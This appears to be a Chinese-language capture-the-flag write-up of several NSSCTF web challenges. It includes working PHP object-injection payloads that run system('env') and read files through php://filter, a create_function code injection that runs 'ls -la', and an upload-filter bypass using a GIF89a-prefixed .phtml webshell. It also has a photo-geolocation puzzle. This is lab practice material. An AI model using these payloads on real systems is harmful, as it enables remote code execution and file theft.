加载过慢请开启缓存 浏览器默认开启
这里要绕过__wakeup()修改$want而且不被is_file()检测到,保证 $todonothing !== $want,还要注意私有化属性
构造payload:O:4:"body":3:{s:10:"\x00body\x00want";s:30:"php://filter/resource=f14g.php";s:17:"\x00body\x00todonothing";s:1:"1";}编码后输入得到flag
这道题打开一片空白查看源码也没发现内容查看网络发现cookie有点奇怪像被base64编码过,解码得到O:4:"User":1:{s:7:"isAdmin";b:0;}这里布尔类型的变量是0这里改成1看看能不能让网页正常显示,这里传一个参数给A用__destruct()给B利用B中的_call()执行命令构造payload:O:1:"A":3:{s:10:"className";s:1:"B";s:8:"funcName";s:6:"system";s:4:"args";a:1:{i:0;s:3:"env";}},这里反转加base64编码输入查看环境变量找到flag
``
根据题目构造payload:?num[]=1&114=9e9
POST:514=9999999999aaa&ctype=OZDCKNQ&is_num=807016042&arr4y[]=a
然后题目让我们去Rc3_function.php
这里create_function会创建一个函数前面是参数列表后面是代码构造payload
nss=}system(‘ls -la’);//&shell=,这里}闭合create_function{,//注释后面的},输入得到flag
这里随便输入一下信息登录进去,发现可以更换头像,尝试木马上去测试发现phtml文件可以上传这里创建一个muma.phtml:GIF89a
上传成功访问上传地址,这里会打开phpinfo找到flag
查看源码发现一个事件的代码,猜测flag在结局里面,
发现一段比较可以的加密字符串用控制台触发一下mota()看看内容
得到flag
图片属性中有拍摄的坐标
根据坐标搜索,发现是一个小区提交发现不对,结合图片是中国电信这里应该是想让我们提交旁边电信有关建筑的名字,这里提交电信大厦发现正确
Flag是NSSCTF{中国电信大厦}
用file伪协议查看index.php,得到
这里得到flag的执行逻辑 触发__wakeup()->触发__toString()->触发__get()->触发__invoke()->include($value);构造payload:
O:12:”Road_is_Long”:2:{s:4:”page”;r:1;s:6:”string”;O:13:”Make_a_Change”:1:{s:6:”effort”;O:13:”Try_Work_Hard”:1:{s:6:”var”;s:49:”php://filter/convert.base64-encode/resource=/flag”;}}编码后输入得到flag的base64编码然后解码得到flag
